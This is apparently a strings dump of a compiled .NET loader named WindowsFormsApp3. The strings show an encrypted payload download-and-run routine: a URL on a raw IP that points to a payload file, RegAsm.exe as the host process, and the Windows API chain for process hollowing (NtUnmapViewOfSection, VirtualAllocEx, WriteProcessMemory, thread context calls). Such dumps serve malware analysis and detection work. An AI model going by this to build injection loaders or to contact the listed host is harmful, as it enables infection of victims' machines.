!This program cannot be run in DOS mode.
`.rsrc
@.reloc
*X *X(
v4.0.30319
#Strings
<Main>d__0
<data>5__1
<client>5__1
<>u__1
Task`1
AsyncTaskMethodBuilder`1
TaskAwaiter`1
Reserved1
ToUInt32
ToInt32
<DownloadFileAsync>d__2
<>s__2
Reserved2
<executablePath>5__3
WindowsFormsApp3
<key>5__4
<decryptedData>5__5
ToInt16
8D70D691C822D55638B6E7FD54CD94170C87D19EB1F628B757506EDE5688D297
<Module>
<Main>
<PrivateImplementationDetails>
PROCESS_SET_QUOTA
WRITE_DAC
PROCESS_CREATE_THREAD
PROCESS_VM_READ
STANDARD_RIGHTS_REQUIRED
PROCESS_DUP_HANDLE
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
DELETE
PROCESS_VM_WRITE
SYNCHRONIZE
READ_CONTROL
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SET_INFORMATION
PROCESS_QUERY_INFORMATION
PROCESS_VM_OPERATION
ITE_OWNER
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
value__
mscorlib
DownloadFileAsync
GetByteArrayAsync
ThreadId
ProcessId
GetProcessById
bytesRead
ResumeThread
thread
lpnLengthNeeded
AwaitUnsafeOnCompleted
get_IsCompleted
Synchronized
GenericAce
CommonAce
InsertAce
defaultInstance
set_AutoScaleMode
IDisposable
ThreadHandle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
processHandle
handle
EncryptFile
applicationName
commandLine
IAsyncStateMachine
SetStateMachine
stateMachine
WellKnownSidType
ValueType
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
Create
EditorBrowsableState
<>1__state
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
WindowsFormsApp3.exe
get_Size
bufferSize
set_ClientSize
SizeOf
System.Runtime.Versioning
disposing
System.Drawing
GetExecutablePath
nLength
get_BinaryLength
length
get_Task
Marshal
System.Security.Principal
RawAcl
get_DiscretionaryAcl
System.ComponentModel
advapi32.dll
kernel32.dll
ntdll.dll
ContainerControl
System.Security.AccessControl
Program
System
GetBinaryForm
resourceMan
bytesWritten
StartupInformation
ProcessInformation
processInformation
securityInformation
System.Configuration
System.Globalization
NtUnmapViewOfSection
System.Reflection
Win32Exception
SetException
HandleRun
CultureInfo
startupInfo
Desktop
System.Net.Http
AsyncTaskMethodBuilder
<>t__builder
Buffer
buffer
get_ResourceManager
AceQualifier
SecurityIdentifier
System.CodeDom.Compiler
IContainer
InlineAssignHelper
TaskAwaiter
GetAwaiter
BitConverter
StdError
.cctor
GenericSecurityDescriptor
pSecurityDescriptor
GetProcessSecurityDescriptor
SetProcessSecurityDescriptor
RawSecurityDescriptor
rawSecurityDescriptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
WindowsFormsApp3.Properties.Resources.resources
DebuggingModes
WindowsFormsApp3.Properties
inheritHandles
threadAttributes
processAttributes
GetBytes
AceFlags
creationFlags
Settings
System.Threading.Tasks
System.Windows.Forms
RuntimeHelpers
CreateProcess
process
baseAddress
address
ProcessAccessRights
components
Object
Protect
protect
target
get_Default
GetResult
SetResult
HttpClient
Environment
environment
InitializeComponent
fileContent
Convert
StdInput
StdOutput
MoveNext
set_Text
Wow64GetThreadContext
Wow64SetThreadContext
context
VirtualAllocEx
InitializeArray
get_Assembly
BlockCopy
ReadProcessMemory
WriteProcessMemory
currentDirectory
System.Security
GetKernelObjectSecurity
SetKernelObjectSecurity
WrapNonExceptionThrows
WindowsFormsApp3
Copyright
2023
$2f4a8899-7e2f-41bf-a2c8-726d8ef02bac
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
halka.Program+<Main>d__0
%halka.Program+<DownloadFileAsync>d__2
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\janad\Desktop\encrypt c# payload\download and run\WindowsFormsApp3\obj\Debug\WindowsFormsApp3.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
WindowsFormsApp3.Properties.Resources
http://185.196.9.20/test/sleeps.txt
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
WindowsFormsApp3
FileVersion
1.0.0.0
InternalName
WindowsFormsApp3.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
WindowsFormsApp3.exe
ProductName
WindowsFormsApp3
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0